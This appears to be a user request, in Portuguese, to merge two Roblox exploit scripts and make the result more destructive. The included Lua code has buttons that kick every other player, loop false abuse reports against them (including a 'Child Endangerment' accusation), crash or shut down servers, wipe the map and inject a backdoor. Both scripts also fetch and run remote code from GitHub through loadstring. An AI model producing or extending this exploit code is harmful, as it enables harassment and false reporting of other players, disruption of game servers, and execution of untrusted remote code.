misture todas as funcionalidades dessa gui: local ReplicatedStorage =
game:GetService("ReplicatedStorage")
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local localPlayer = Players.LocalPlayer
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")
local CoreGui = game:GetService("CoreGui")
local UserInputService = game:GetService("UserInputService")
-- CLIENT-SIDE WHITELIST
local CLIENT_WHITELIST = {
[9513226359] = true
}
-- Função para executar comandos localmente
local function executeLocalCommand(commandData)
if not commandData or not commandData.Command then
return false
end
local success, errorMsg = pcall(function()
-- Usando loadstring se disponível, caso contrário, use uma alternativa
if loadstring then
loadstring(commandData.Command)()
else
-- Alternativa para ambientes onde loadstring não está disponível
local fn, err = load(commandData.Command)
if fn then
fn()
else
error(err)
end
end
end)
if not success then
warn("Error executing command: " .. tostring(errorMsg))
return false
end
return true
end
-- Função para criar a GUI Bl00x
local function createBl00xGUI()
if not CLIENT_WHITELIST[localPlayer.UserId] then
return
end
local player = game.Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")
-- Remover GUI existente
local existingGUI = playerGui:FindFirstChild("Bl00xGUI")
if existingGUI then
existingGUI:Destroy()
end
-- Instâncias
local ScreenGui = Instance.new("ScreenGui")
local MainFrame = Instance.new("Frame")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local BanOthers = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local DecalSpam = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local BanOthersACC = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local Skybox = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local CrashRandomPlayer = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local CrashServer = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local ShutDownGame = Instance.new("TextButton")
local UICorner_8 = Instance.new("UICorner")
local Announcement = Instance.new("TextButton")
local UICorner_9 = Instance.new("UICorner")
local KickAll = Instance.new("TextButton")
local UICorner_10 = Instance.new("UICorner")
local FEBypassGUI = Instance.new("TextButton")
local UICorner_11 = Instance.new("UICorner")
local Hint = Instance.new("TextButton")
local UICorner_12 = Instance.new("UICorner")
local NukeMap = Instance.new("TextButton")
local UICorner_13 = Instance.new("UICorner")
local NukeServer = Instance.new("TextButton")
local UICorner_14 = Instance.new("UICorner")
local EnableLoadstring = Instance.new("TextButton")
local UICorner_15 = Instance.new("UICorner")
local PlayMusic = Instance.new("TextButton")
local UICorner_16 = Instance.new("UICorner")
local UICorner_18 = Instance.new("UICorner")
local Frame_2 = Instance.new("Frame")
local UICorner_19 = Instance.new("UICorner")
local ExecuteBtn = Instance.new("TextButton")
local UICorner_20 = Instance.new("UICorner")
local TextBox = Instance.new("TextBox")
local UICorner_21 = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local InjectBackdoor = Instance.new("TextButton")
local UICorner_17 = Instance.new("UICorner")
local StatusLabel = Instance.new("TextLabel")
-- Configuração das propriedades da UI
ScreenGui.Name = "Bl00xGUI"
ScreenGui.Parent = playerGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.ResetOnSpawn = false
MainFrame.Name = "MainFrame"
MainFrame.Parent = ScreenGui
MainFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
MainFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
MainFrame.BorderSizePixel = 0
MainFrame.Position = UDim2.new(0.043, 0, 0.045, 0)
MainFrame.Size = UDim2.new(0, 690, 0, 346)
MainFrame.Active = true
MainFrame.Draggable = true
Frame.Parent = MainFrame
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.025, 0, 0.145, 0)
Frame.Size = UDim2.new(0, 408, 0, 286)
UICorner.CornerRadius = UDim.new(0, 20)
UICorner.Parent = Frame
-- Configurar botões com cantos arredondados e propriedades
local function setupButton(button, position, text)
button.Parent = Frame
button.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
button.BorderColor3 = Color3.fromRGB(0, 0, 0)
button.BorderSizePixel = 0
button.Position = position
button.Size = UDim2.new(0, 116, 0, 39)
button.Font = Enum.Font.Michroma
button.Text = text
button.TextColor3 = Color3.fromRGB(255, 255, 255)
button.TextSize = 14
local uicorner = Instance.new("UICorner")
uicorner.CornerRadius = UDim.new(0, 20)
uicorner.Parent = button
end
setupButton(BanOthers, UDim2.new(0.002, 0, 0.026, 0), "BanOthers")
setupButton(DecalSpam, UDim2.new(0.306, 0, 0.026, 0), "DecalSpam")
setupButton(BanOthersACC, UDim2.new(0, 0, 0.192, 0), "BanAcc")
setupButton(Skybox, UDim2.new(0, 0, 0.349, 0), "SkyBox")
setupButton(CrashRandomPlayer, UDim2.new(0, 0, 0.508, 0), "CrashPlayer")
setupButton(CrashServer, UDim2.new(0.002, 0, 0.672, 0), "CrashServer")
setupButton(ShutDownGame, UDim2.new(0.306, 0, 0.192, 0), "ShutDownGame")
setupButton(Announcement, UDim2.new(0.306, 0, 0.349, 0), "Announcement")
setupButton(KickAll, UDim2.new(0.306, 0, 0.508, 0), "KickAll")
setupButton(FEBypassGUI, UDim2.new(0.306, 0, 0.672, 0), "FEBypassGUI")
setupButton(Hint, UDim2.new(0.642, 0, 0.026, 0), "Hint")
setupButton(NukeMap, UDim2.new(0.642, 0, 0.192, 0), "NukeMap")
setupButton(NukeServer, UDim2.new(0.642, 0, 0.349, 0), "NukeServer")
setupButton(EnableLoadstring, UDim2.new(0.642, 0, 0.508, 0),
"EnableLoadstring")
setupButton(PlayMusic, UDim2.new(0.642, 0, 0.672, 0), "PlayMusic")
-- Frame secundário e controles
Frame_2.Parent = MainFrame
Frame_2.BackgroundColor3 = Color3.fromRGB(131, 131, 131)
Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0.663, 0, 0.145, 0)
Frame_2.Size = UDim2.new(0, 199, 0, 236)
UICorner_19.CornerRadius = UDim.new(0, 20)
UICorner_19.Parent = Frame_2
ExecuteBtn.Parent = Frame_2
ExecuteBtn.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
ExecuteBtn.BorderColor3 = Color3.fromRGB(0, 0, 0)
ExecuteBtn.BorderSizePixel = 0
ExecuteBtn.Position = UDim2.new(0, 0, 1.047, 0)
ExecuteBtn.Size = UDim2.new(0, 200, 0, 39)
ExecuteBtn.Font = Enum.Font.Michroma
ExecuteBtn.Text = "Execute Script"
ExecuteBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
ExecuteBtn.TextSize = 14
UICorner_20.CornerRadius = UDim.new(0, 20)
UICorner_20.Parent = ExecuteBtn
TextBox.Parent = Frame_2
TextBox.BackgroundColor3 = Color3.fromRGB(131, 131, 131)
TextBox.BorderColor3 = Color3.fromRGB(83, 83, 83)
TextBox.BorderSizePixel = 0
TextBox.Position = UDim2.new(0.035, 0, 0.03, 0)
TextBox.Size = UDim2.new(0, 186, 0, 221)
TextBox.Font = Enum.Font.Michroma
TextBox.PlaceholderColor3 = Color3.fromRGB(236, 236, 236)
TextBox.PlaceholderText = "-- Write your script here"
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextSize = 14
TextBox.TextXAlignment = Enum.TextXAlignment.Left
TextBox.TextYAlignment = Enum.TextYAlignment.Top
UICorner_21.CornerRadius = UDim.new(0, 20)
UICorner_21.Parent = TextBox
TextLabel.Parent = MainFrame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.026, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 407, 0, 50)
TextLabel.Font = Enum.Font.Michroma
TextLabel.Text = "Bl00xGUI V3"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 59
TextLabel.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
StatusLabel.Parent = MainFrame
StatusLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
StatusLabel.BackgroundTransparency = 1
StatusLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
StatusLabel.BorderSizePixel = 0
StatusLabel.Position = UDim2.new(0.6, 0, 0, 0)
StatusLabel.Size = UDim2.new(0, 200, 0, 50)
StatusLabel.Font = Enum.Font.Michroma
StatusLabel.Text = "LOCAL MODE"
StatusLabel.TextColor3 = Color3.fromRGB(0, 255, 0)
StatusLabel.TextSize = 20
InjectBackdoor.Name = "InjectBackdoor"
InjectBackdoor.Parent = Frame
InjectBackdoor.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
InjectBackdoor.BorderColor3 = Color3.fromRGB(0, 0, 0)
InjectBackdoor.BorderSizePixel = 0
InjectBackdoor.Position = UDim2.new(0.002, 0, 0.842, 0)
InjectBackdoor.Size = UDim2.new(0, 392, 0, 39)
InjectBackdoor.Font = Enum.Font.Michroma
InjectBackdoor.Text = "Inject Backdoor"
InjectBackdoor.TextColor3 = Color3.fromRGB(255, 255, 255)
InjectBackdoor.TextSize = 14
UICorner_17.CornerRadius = UDim.new(0, 20)
UICorner_17.Parent = InjectBackdoor
-- Conectar eventos de clique dos botões para executar comandos localmente
BanOthers.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "for _, player in ipairs(game.Players:GetPlayers()) do if
player ~= game.Players.LocalPlayer then player:Kick('GET R3KT BY TEAM Bl00xkidd')
end end"
})
end)
DecalSpam.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local ID = 124018789726194
local function applyDecals(part)
if part:IsA("BasePart") then
for face = 0, 5 do
local decal = Instance.new("Decal")
decal.Face = face
decal.Texture = "rbxassetid://" .. ID
decal.Parent = part
end
end
end
for _, obj in pairs(workspace:GetDescendants()) do
applyDecals(obj)
end
workspace.DescendantAdded:Connect(applyDecals)
]]
})
end)
BanOthersACC.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
while true do
task.wait(0.5)
for _, player in ipairs(game.Players:GetPlayers()) do
if player ~= game.Players.LocalPlayer then
pcall(function()
game:GetService("Players"):ReportAbuse(player, "Swearing", "Child
Endangerment")
end)
end
end
end
]]
})
end)
Skybox.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local DecalID = 124018789726194
local sky = game.Lighting:FindFirstChild("Sky") or Instance.new("Sky")
sky.Parent = game.Lighting
sky.SkyboxBk = "rbxassetid://" .. DecalID
sky.SkyboxDn = "rbxassetid://" .. DecalID
sky.SkyboxFt = "rbxassetid://" .. DecalID
sky.SkyboxLf = "rbxassetid://" .. DecalID
sky.SkyboxRt = "rbxassetid://" .. DecalID
sky.SkyboxUp = "rbxassetid://" .. DecalID
]]
})
end)
CrashRandomPlayer.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
for i = 1, 100 do
task.spawn(function()
while true do
local part = Instance.new("Part")
part.Parent = workspace
part.Position = Vector3.new(0, 500, 0)
part.Anchored = true
part:SetAttribute("CrashAttempt", true)
task.wait()
end
end)
end
]]
})
end)
CrashServer.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "while true do task.wait() end"
})
end)
ShutDownGame.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "game:Shutdown()"
})
end)
Announcement.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local msg = Instance.new("Message")
msg.Name = "GETR3KTBYTEAMBL00XKIDD"
msg.Text = "!!!GET R3KT BY TEAM BL00XKIDD!!!"
msg.Parent = workspace
task.wait(5)
msg:Destroy()
]]
})
end)
KickAll.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "for _, player in ipairs(game.Players:GetPlayers()) do if
player ~= game.Players.LocalPlayer then player:Kick('GET R3KT BY TEAM Bl00xkidd')
end end"
})
end)
FEBypassGUI.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command =
"loadstring(game:HttpGet('https://raw.githubusercontent.com/g00lXploiter/
g00lXploiter/main/Fe%20bypass'))()"
})
end)
Hint.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local hint = Instance.new("Hint")
hint.Text = "!!!GET R3KT BY TEAM Bl00xkidd!!!"
hint.Parent = workspace
task.wait(5)
hint:Destroy()
]]
})
end)
NukeMap.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "workspace:ClearAllChildren()"
})
end)
NukeServer.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
for i = 1, 1000 do
task.spawn(function()
while true do
local part = Instance.new("Part")
part.Size = Vector3.new(100, 100, 100)
part.Position = Vector3.new(math.random(-500, 500), math.random(100,
500), math.random(-500, 500))
part.Anchored = false
part.Velocity = Vector3.new(math.random(-100, 100), math.random(-100,
100), math.random(-100, 100))
part.Parent = workspace
task.wait()
end
end)
end
]]
})
end)
EnableLoadstring.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "local env = getfenv(); env.loadstring = loadstring"
})
end)
PlayMusic.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local sound = Instance.new("Sound")
sound.SoundId = "rbxassetid://121336636707861"
sound.Volume = 10
sound.Looped = true
sound.Parent = game:GetService("SoundService")
sound:Play()
]]
})
end)
InjectBackdoor.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local backdoorScript = Instance.new("Script")
backdoorScript.Source = 'print("Backdoor injected locally")'
backdoorScript.Parent = game:GetService("ServerScriptService")
]]
})
end)
ExecuteBtn.MouseButton1Click:Connect(function()
local scriptCode = TextBox.Text
if scriptCode and scriptCode ~= "" then
executeLocalCommand({
Type = "Command",
Command = scriptCode
})
end
end)
-- Adicionar botão de fechar
local CloseButton = Instance.new("TextButton")
CloseButton.Name = "CloseButton"
CloseButton.Parent = MainFrame
CloseButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
CloseButton.BorderSizePixel = 0
CloseButton.Position = UDim2.new(0.95, 0, 0.01, 0)
CloseButton.Size = UDim2.new(0, 20, 0, 20)
CloseButton.Font = Enum.Font.Michroma
CloseButton.Text = "X"
CloseButton.TextColor3 = Color3.fromRGB(255, 255, 255)
CloseButton.TextSize = 14
local UICornerClose = Instance.new("UICorner")
UICornerClose.CornerRadius = UDim.new(0, 10)
UICornerClose.Parent = CloseButton
CloseButton.MouseButton1Click:Connect(function()
ScreenGui:Destroy()
end)
end
-- Inicialização do script
local function initialize()
if not CLIENT_WHITELIST[localPlayer.UserId] then
return
end
-- Criar a GUI
createBl00xGUI()
-- Adicionar atalho de teclado para abrir/fechar a GUI
local guiVisible = true
UserInputService.InputBegan:Connect(function(input, gameProcessed)
if gameProcessed then return end
if input.KeyCode == Enum.KeyCode.RightShift then
local playerGui = localPlayer:WaitForChild("PlayerGui")
local bl00xGUI = playerGui:FindFirstChild("Bl00xGUI")
if bl00xGUI then
guiVisible = not guiVisible
bl00xGUI.Enabled = guiVisible
else
createBl00xGUI()
end
end
end)
end
-- Executar inicialização
pcall(initialize)
com as funcionalidades dessa gui e mantendo tudo, e faça ser tipo, mais funcional,
mais botoes, mais funcionalidades DESTRUTIVAS que nem na imagem que mostra a
interface do c00lgui: if game.CoreGui:FindFirstChild("RC7LOLOL") then
game.CoreGui:FindFirstChild("RC7LOLOL"):Destroy()
end
local Screen = game:GetObjects("rbxassetid://14625538289")[1]
Screen.Parent = game.CoreGui
local RC7 = Screen.RC7
local Explorer = Screen.Explorer
local Save = Screen.Save
local Open = Screen.Open
local CurrentTab = "1"
local Buttonz = RC7.Buttons
local NewestTab = 1
if not isfolder("RC7Scripts") then
makefolder("RC7Scripts")
end
Explorer.Visible = false
Open.Visible = false
Save.Visible = false
RC7.Draggable = true
Open.Draggable = true
Open.Active = true
RC7.Active = true
for i,v in next, listfiles("RC7Scripts") do
local a = Explorer.Buttons.Yes:Clone()
a.Parent = Explorer.Buttons
a.Visible = true
a.Text = v
a.Name = v
a.MouseButton1Click:Connect(function()
pcall(function()
RC7.TabTexts:FindFirstChild(CurrentTab):FindFirstChild(CurrentTab).Text
= readfile(listfiles("RC7Scripts")[i])
end)
Explorer.Visible = false
end)
end
Save.save.MouseButton1Click:Connect(function()
writefile("RC7Scripts/" .. tostring(Save.name.Text) .. ".lua",
tostring(RC7.TabTexts:FindFirstChild(CurrentTab):FindFirstChild(CurrentTab).Text))
Save.Visible = false
end)
Buttonz.Execute.MouseButton1Click:Connect(function()
local success, result = pcall(function()
assert(loadstring(RC7.TabTexts[CurrentTab][CurrentTab].Text))()
end)
if not success then
local Error = RC7.Console.Error:Clone()
Error.Text = result
Error.Parent = RC7.Console
Error.Visible = true
end
end)
Buttonz.Open.MouseButton1Click:Connect(function()
Explorer.Visible = true
end)
Explorer.Exit.MouseButton1Click:Connect(function()
Explorer.Visible = false
end)
Buttonz.Clear.MouseButton1Click:Connect(function()
RC7.TabTexts:FindFirstChild(CurrentTab):FindFirstChild(CurrentTab).Text =
""
end)
Buttonz.Inf.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/
infiniteyield/master/source"))()
end)
Buttonz.Save.MouseButton1Click:Connect(function()
Save.Visible = true
end)
Save.Close.MouseButton1Click:Connect(function()
Save.Visible = false
end)
Buttonz.Idk.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/
SimpleSpySource/master/SimpleSpy.lua"))()
end)
Buttonz.Dex.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/infyiff/backup/
main/dex.lua"))()
end)
Buttonz.Attach.MouseButton1Click:Connect(function()
if messagebox then
wait(2)
messagebox("RC7", "Attached", 0)
end
end)
RC7.Tabs:FindFirstChild(1).MouseButton1Click:Connect(function()
CurrentTab = "1"
for i,v in next, RC7.TabTexts:GetChildren() do
if v.Name == "1" then
v.Visible = true
else
v.Visible = false
end
end
end)
local function ANewTab()
local Tab = RC7.Tabs:FindFirstChild(1):Clone()
NewestTab = NewestTab + 1
Tab.Parent = RC7.Tabs
Tab.Name = tostring(NewestTab)
Tab.Text = "(" .. Tab.Name .. ").lua"
local TextBoxClone = RC7.TabTexts:FindFirstChild(1):Clone()
TextBoxClone.Parent = RC7.TabTexts
TextBoxClone.Name = NewestTab
TextBoxClone:FindFirstChild(1).Name = NewestTab
TextBoxClone[NewestTab].Text = ""
Tab.MouseButton1Click:Connect(function()
CurrentTab = Tab.Name
for i,v in next, RC7.TabTexts:GetChildren() do
if v.Name == Tab.Name then
v.Visible = true
else
v.Visible = false
end
end
end)
end
RC7.Top.Frame.Close.MouseButton1Click:Connect(function()
Open.Visible = true
RC7.Visible = false
end)
RC7.Tabs.AddNewTab.MouseButton1Click:Connect(function()
ANewTab()
RC7.Tabs.AddNewTab.Parent = RC7
wait()
RC7.AddNewTab.Parent = RC7.Tabs
end)
Open.MouseButton1Click:Connect(function()
Open.Visible = false
RC7.Visible = true
end)
RC7.TabTexts:FindFirstChild(CurrentTab):FindFirstChild(CurrentTab).Text = ""